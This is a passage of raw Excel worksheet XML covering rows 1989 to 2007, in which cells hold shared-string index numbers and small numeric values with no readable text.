      <c r="U1989" s="12" t="s">
        <v>14342</v>
      </c>
      <c r="V1989" s="12" t="s">
        <v>14199</v>
      </c>
      <c r="W1989" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1989" s="12">
        <v>6</v>
      </c>
      <c r="Y1989" s="12" t="s">
        <v>14343</v>
      </c>
    </row>
    <row r="1990" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1990" s="12">
        <v>10249</v>
      </c>
      <c r="B1990" s="12" t="s">
        <v>28354</v>
      </c>
      <c r="D1990" s="12" t="s">
        <v>30467</v>
      </c>
      <c r="F1990" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1990" s="12" t="s">
        <v>14349</v>
      </c>
      <c r="H1990" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1990" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1990" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K1990" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1990" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1990" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1990" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1990" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1990" s="12" t="s">
        <v>14085</v>
      </c>
      <c r="Q1990" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1990" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1990" s="12" t="s">
        <v>14350</v>
      </c>
      <c r="T1990" s="12" t="s">
        <v>14351</v>
      </c>
      <c r="U1990" s="12" t="s">
        <v>14352</v>
      </c>
      <c r="V1990" s="12" t="s">
        <v>3902</v>
      </c>
      <c r="W1990" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1990" s="12">
        <v>2</v>
      </c>
      <c r="Y1990" s="12" t="s">
        <v>14353</v>
      </c>
    </row>
    <row r="1991" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1991" s="12">
        <v>10259</v>
      </c>
      <c r="B1991" s="12" t="s">
        <v>31217</v>
      </c>
      <c r="D1991" s="12" t="s">
        <v>31209</v>
      </c>
      <c r="E1991" s="12" t="s">
        <v>31486</v>
      </c>
      <c r="F1991" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1991" s="12" t="s">
        <v>14359</v>
      </c>
      <c r="H1991" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1991" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1991" s="12" t="s">
        <v>2451</v>
      </c>
      <c r="K1991" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1991" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1991" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1991" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1991" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1991" s="12" t="s">
        <v>14345</v>
      </c>
      <c r="Q1991" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1991" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1991" s="12" t="s">
        <v>14360</v>
      </c>
      <c r="T1991" s="12" t="s">
        <v>10763</v>
      </c>
      <c r="U1991" s="12" t="s">
        <v>14361</v>
      </c>
      <c r="V1991" s="12" t="s">
        <v>5074</v>
      </c>
      <c r="W1991" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1991" s="12">
        <v>6</v>
      </c>
      <c r="Y1991" s="12" t="s">
        <v>14362</v>
      </c>
    </row>
    <row r="1992" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1992" s="12">
        <v>10266</v>
      </c>
      <c r="B1992" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1992" s="12" t="s">
        <v>30841</v>
      </c>
      <c r="E1992" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1992" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1992" s="12" t="s">
        <v>14363</v>
      </c>
      <c r="H1992" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1992" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1992" s="12" t="s">
        <v>162</v>
      </c>
      <c r="K1992" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1992" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1992" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1992" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1992" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1992" s="12" t="s">
        <v>14364</v>
      </c>
      <c r="Q1992" s="12" t="s">
        <v>28336</v>
      </c>
      <c r="R1992" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1992" s="12" t="s">
        <v>14365</v>
      </c>
      <c r="T1992" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1992" s="12" t="s">
        <v>14366</v>
      </c>
      <c r="V1992" s="12" t="s">
        <v>3737</v>
      </c>
      <c r="W1992" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1992" s="12">
        <v>3</v>
      </c>
      <c r="Y1992" s="12" t="s">
        <v>14367</v>
      </c>
    </row>
    <row r="1993" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1993" s="12">
        <v>10271</v>
      </c>
      <c r="B1993" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1993" s="12" t="s">
        <v>30913</v>
      </c>
      <c r="E1993" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1993" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1993" s="12" t="s">
        <v>14368</v>
      </c>
      <c r="H1993" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1993" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1993" s="12" t="s">
        <v>258</v>
      </c>
      <c r="K1993" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1993" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1993" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1993" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1993" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1993" s="12" t="s">
        <v>14369</v>
      </c>
      <c r="Q1993" s="12" t="s">
        <v>28336</v>
      </c>
      <c r="R1993" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1993" s="12" t="s">
        <v>14370</v>
      </c>
      <c r="T1993" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1993" s="12" t="s">
        <v>14371</v>
      </c>
      <c r="V1993" s="12" t="s">
        <v>3984</v>
      </c>
      <c r="W1993" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1993" s="12">
        <v>5</v>
      </c>
      <c r="Y1993" s="12" t="s">
        <v>14372</v>
      </c>
    </row>
    <row r="1994" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1994" s="12">
        <v>10273</v>
      </c>
      <c r="B1994" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C1994" s="12" t="s">
        <v>28357</v>
      </c>
      <c r="D1994" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1994" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F1994" s="12" t="s">
        <v>29764</v>
      </c>
      <c r="G1994" s="12" t="s">
        <v>14378</v>
      </c>
      <c r="H1994" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1994" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1994" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1994" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1994" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1994" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1994" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1994" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1994" s="12" t="s">
        <v>6633</v>
      </c>
      <c r="Q1994" s="12" t="s">
        <v>28306</v>
      </c>
      <c r="R1994" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1994" s="12" t="s">
        <v>14379</v>
      </c>
      <c r="T1994" s="12" t="s">
        <v>12267</v>
      </c>
      <c r="U1994" s="12" t="s">
        <v>14380</v>
      </c>
      <c r="V1994" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W1994" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1994" s="12">
        <v>31</v>
      </c>
      <c r="Y1994" s="12" t="s">
        <v>14381</v>
      </c>
    </row>
    <row r="1995" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1995" s="12">
        <v>10276</v>
      </c>
      <c r="B1995" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1995" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1995" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F1995" s="12" t="s">
        <v>29768</v>
      </c>
      <c r="G1995" s="12" t="s">
        <v>14387</v>
      </c>
      <c r="H1995" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1995" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1995" s="12" t="s">
        <v>458</v>
      </c>
      <c r="K1995" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1995" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1995" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1995" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1995" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1995" s="12" t="s">
        <v>14085</v>
      </c>
      <c r="Q1995" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1995" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1995" s="12" t="s">
        <v>14388</v>
      </c>
      <c r="T1995" s="12" t="s">
        <v>14389</v>
      </c>
      <c r="U1995" s="12" t="s">
        <v>14390</v>
      </c>
      <c r="V1995" s="12" t="s">
        <v>6579</v>
      </c>
      <c r="W1995" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1995" s="12">
        <v>9</v>
      </c>
      <c r="Y1995" s="12" t="s">
        <v>14391</v>
      </c>
    </row>
    <row r="1996" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1996" s="12">
        <v>10279</v>
      </c>
      <c r="B1996" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1996" s="12" t="s">
        <v>30913</v>
      </c>
      <c r="E1996" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1996" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1996" s="12" t="s">
        <v>14392</v>
      </c>
      <c r="H1996" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1996" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1996" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K1996" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1996" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1996" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1996" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1996" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1996" s="12" t="s">
        <v>14393</v>
      </c>
      <c r="Q1996" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1996" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1996" s="12" t="s">
        <v>14394</v>
      </c>
      <c r="T1996" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1996" s="12" t="s">
        <v>14395</v>
      </c>
      <c r="V1996" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W1996" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1996" s="12">
        <v>5</v>
      </c>
      <c r="Y1996" s="12" t="s">
        <v>14396</v>
      </c>
    </row>
    <row r="1997" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1997" s="12">
        <v>10286</v>
      </c>
      <c r="B1997" s="12" t="s">
        <v>30682</v>
      </c>
      <c r="D1997" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1997" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1997" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1997" s="12" t="s">
        <v>14397</v>
      </c>
      <c r="H1997" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1997" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1997" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1997" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1997" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1997" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1997" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1997" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1997" s="12" t="s">
        <v>14288</v>
      </c>
      <c r="Q1997" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1997" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1997" s="12" t="s">
        <v>14398</v>
      </c>
      <c r="T1997" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1997" s="12" t="s">
        <v>14399</v>
      </c>
      <c r="V1997" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W1997" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1997" s="12">
        <v>3</v>
      </c>
      <c r="Y1997" s="12" t="s">
        <v>14400</v>
      </c>
    </row>
    <row r="1998" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1998" s="12">
        <v>10289</v>
      </c>
      <c r="B1998" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1998" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1998" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1998" s="12" t="s">
        <v>30368</v>
      </c>
      <c r="G1998" s="12" t="s">
        <v>14401</v>
      </c>
      <c r="H1998" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1998" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1998" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K1998" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1998" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1998" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1998" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1998" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1998" s="12" t="s">
        <v>14402</v>
      </c>
      <c r="Q1998" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1998" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1998" s="12" t="s">
        <v>14403</v>
      </c>
      <c r="T1998" s="12" t="s">
        <v>4822</v>
      </c>
      <c r="U1998" s="12" t="s">
        <v>14404</v>
      </c>
      <c r="V1998" s="12" t="s">
        <v>4769</v>
      </c>
      <c r="W1998" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1998" s="12">
        <v>4</v>
      </c>
      <c r="Y1998" s="12" t="s">
        <v>14405</v>
      </c>
    </row>
    <row r="1999" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1999" s="12">
        <v>10295</v>
      </c>
      <c r="B1999" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1999" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="F1999" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G1999" s="12" t="s">
        <v>14406</v>
      </c>
      <c r="H1999" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1999" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1999" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K1999" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1999" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1999" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1999" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1999" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1999" s="12" t="s">
        <v>14393</v>
      </c>
      <c r="Q1999" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1999" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1999" s="12" t="s">
        <v>14407</v>
      </c>
      <c r="T1999" s="12" t="s">
        <v>11935</v>
      </c>
      <c r="U1999" s="12" t="s">
        <v>14408</v>
      </c>
      <c r="V1999" s="12" t="s">
        <v>3902</v>
      </c>
      <c r="W1999" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1999" s="12">
        <v>1</v>
      </c>
      <c r="Y1999" s="12" t="s">
        <v>14409</v>
      </c>
    </row>
    <row r="2000" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2000" s="12">
        <v>10297</v>
      </c>
      <c r="B2000" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2000" s="12" t="s">
        <v>30427</v>
      </c>
      <c r="E2000" s="12" t="s">
        <v>31487</v>
      </c>
      <c r="F2000" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G2000" s="12" t="s">
        <v>14410</v>
      </c>
      <c r="H2000" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2000" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2000" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K2000" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2000" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2000" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2000" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2000" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2000" s="12" t="s">
        <v>14411</v>
      </c>
      <c r="Q2000" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R2000" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2000" s="12" t="s">
        <v>14412</v>
      </c>
      <c r="T2000" s="12" t="s">
        <v>13923</v>
      </c>
      <c r="U2000" s="12" t="s">
        <v>14413</v>
      </c>
      <c r="V2000" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W2000" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2000" s="12">
        <v>4</v>
      </c>
      <c r="Y2000" s="12" t="s">
        <v>14414</v>
      </c>
    </row>
    <row r="2001" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2001" s="12">
        <v>10300</v>
      </c>
      <c r="B2001" s="12" t="s">
        <v>28354</v>
      </c>
      <c r="D2001" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2001" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F2001" s="12" t="s">
        <v>30463</v>
      </c>
      <c r="G2001" s="12" t="s">
        <v>14415</v>
      </c>
      <c r="H2001" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2001" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2001" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K2001" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2001" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2001" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2001" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2001" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2001" s="12" t="s">
        <v>14416</v>
      </c>
      <c r="Q2001" s="12" t="s">
        <v>28310</v>
      </c>
      <c r="R2001" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2001" s="12" t="s">
        <v>14417</v>
      </c>
      <c r="T2001" s="12" t="s">
        <v>12546</v>
      </c>
      <c r="U2001" s="12" t="s">
        <v>9750</v>
      </c>
      <c r="V2001" s="12" t="s">
        <v>3902</v>
      </c>
      <c r="W2001" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2001" s="12">
        <v>44</v>
      </c>
      <c r="Y2001" s="12" t="s">
        <v>14418</v>
      </c>
    </row>
    <row r="2002" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2002" s="12">
        <v>10302</v>
      </c>
      <c r="B2002" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2002" s="12" t="s">
        <v>30841</v>
      </c>
      <c r="E2002" s="12" t="s">
        <v>31437</v>
      </c>
      <c r="F2002" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2002" s="12" t="s">
        <v>14419</v>
      </c>
      <c r="H2002" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2002" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2002" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K2002" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2002" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2002" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2002" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2002" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2002" s="12" t="s">
        <v>14420</v>
      </c>
      <c r="Q2002" s="12" t="s">
        <v>28336</v>
      </c>
      <c r="R2002" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2002" s="12" t="s">
        <v>14421</v>
      </c>
      <c r="T2002" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2002" s="12" t="s">
        <v>14422</v>
      </c>
      <c r="V2002" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W2002" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2002" s="12">
        <v>6</v>
      </c>
      <c r="Y2002" s="12" t="s">
        <v>14423</v>
      </c>
    </row>
    <row r="2003" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2003" s="12">
        <v>10303</v>
      </c>
      <c r="B2003" s="12" t="s">
        <v>30899</v>
      </c>
      <c r="D2003" s="12" t="s">
        <v>30913</v>
      </c>
      <c r="E2003" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F2003" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2003" s="12" t="s">
        <v>14424</v>
      </c>
      <c r="H2003" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2003" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J2003" s="12" t="s">
        <v>368</v>
      </c>
      <c r="K2003" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2003" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2003" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2003" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2003" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2003" s="12" t="s">
        <v>14345</v>
      </c>
      <c r="Q2003" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R2003" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2003" s="12" t="s">
        <v>14425</v>
      </c>
      <c r="T2003" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2003" s="12" t="s">
        <v>14426</v>
      </c>
      <c r="V2003" s="12" t="s">
        <v>2091</v>
      </c>
      <c r="W2003" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2003" s="12">
        <v>10</v>
      </c>
      <c r="Y2003" s="12" t="s">
        <v>14427</v>
      </c>
    </row>
    <row r="2004" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2004" s="12">
        <v>10304</v>
      </c>
      <c r="B2004" s="12" t="s">
        <v>28341</v>
      </c>
      <c r="C2004" s="12" t="s">
        <v>28343</v>
      </c>
      <c r="D2004" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E2004" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F2004" s="12" t="s">
        <v>29744</v>
      </c>
      <c r="G2004" s="12" t="s">
        <v>14428</v>
      </c>
      <c r="H2004" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2004" s="12" t="s">
        <v>14196</v>
      </c>
      <c r="J2004" s="12" t="s">
        <v>14197</v>
      </c>
      <c r="K2004" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2004" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2004" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2004" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2004" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2004" s="12" t="s">
        <v>14429</v>
      </c>
      <c r="Q2004" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R2004" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2004" s="12" t="s">
        <v>14430</v>
      </c>
      <c r="T2004" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2004" s="12" t="s">
        <v>14431</v>
      </c>
      <c r="V2004" s="12" t="s">
        <v>14432</v>
      </c>
      <c r="W2004" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2004" s="12">
        <v>2</v>
      </c>
      <c r="Y2004" s="12" t="s">
        <v>14433</v>
      </c>
    </row>
    <row r="2005" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2005" s="12">
        <v>10305</v>
      </c>
      <c r="B2005" s="12" t="s">
        <v>30918</v>
      </c>
      <c r="D2005" s="12" t="s">
        <v>30913</v>
      </c>
      <c r="E2005" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F2005" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2005" s="12" t="s">
        <v>14434</v>
      </c>
      <c r="H2005" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2005" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J2005" s="12" t="s">
        <v>277</v>
      </c>
      <c r="K2005" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2005" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2005" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2005" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2005" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2005" s="12" t="s">
        <v>14393</v>
      </c>
      <c r="Q2005" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R2005" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2005" s="12" t="s">
        <v>14435</v>
      </c>
      <c r="T2005" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2005" s="12" t="s">
        <v>14436</v>
      </c>
      <c r="V2005" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W2005" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2005" s="12">
        <v>1</v>
      </c>
      <c r="Y2005" s="12" t="s">
        <v>14437</v>
      </c>
    </row>
    <row r="2006" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2006" s="12">
        <v>10309</v>
      </c>
      <c r="B2006" s="12" t="s">
        <v>30520</v>
      </c>
      <c r="C2006" s="12" t="s">
        <v>30521</v>
      </c>
      <c r="D2006" s="12" t="s">
        <v>30522</v>
      </c>
      <c r="E2006" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F2006" s="12" t="s">
        <v>30505</v>
      </c>
      <c r="G2006" s="12" t="s">
        <v>14438</v>
      </c>
      <c r="H2006" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2006" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J2006" s="12" t="s">
        <v>283</v>
      </c>
      <c r="K2006" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2006" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2006" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2006" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2006" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2006" s="12" t="s">
        <v>14085</v>
      </c>
      <c r="Q2006" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R2006" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2006" s="12" t="s">
        <v>14439</v>
      </c>
      <c r="T2006" s="12" t="s">
        <v>8441</v>
      </c>
      <c r="U2006" s="12" t="s">
        <v>14440</v>
      </c>
      <c r="V2006" s="12" t="s">
        <v>3605</v>
      </c>
      <c r="W2006" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2006" s="12">
        <v>10</v>
      </c>
      <c r="Y2006" s="12" t="s">
        <v>14441</v>
      </c>
    </row>
    <row r="2007" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2007" s="12">
        <v>10317</v>
      </c>
      <c r="B2007" s="12" t="s">
        <v>31315</v>
      </c>
      <c r="C2007" s="12" t="s">
        <v>31316</v>
      </c>
      <c r="D2007" s="12" t="s">
        <v>31307</v>
      </c>
      <c r="E2007" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F2007" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G2007" s="12" t="s">
        <v>14442</v>
      </c>
      <c r="H2007" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2007" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2007" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K2007" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2007" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2007" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2007" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2007" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2007" s="12" t="s">
        <v>14443</v>
      </c>
      <c r="Q2007" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R2007" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2007" s="12" t="s">
        <v>14444</v>
      </c>
      <c r="T2007" s="12" t="s">
        <v>4704</v>
      </c>
      <c r="U2007" s="12" t="s">
        <v>14445</v>
      </c>
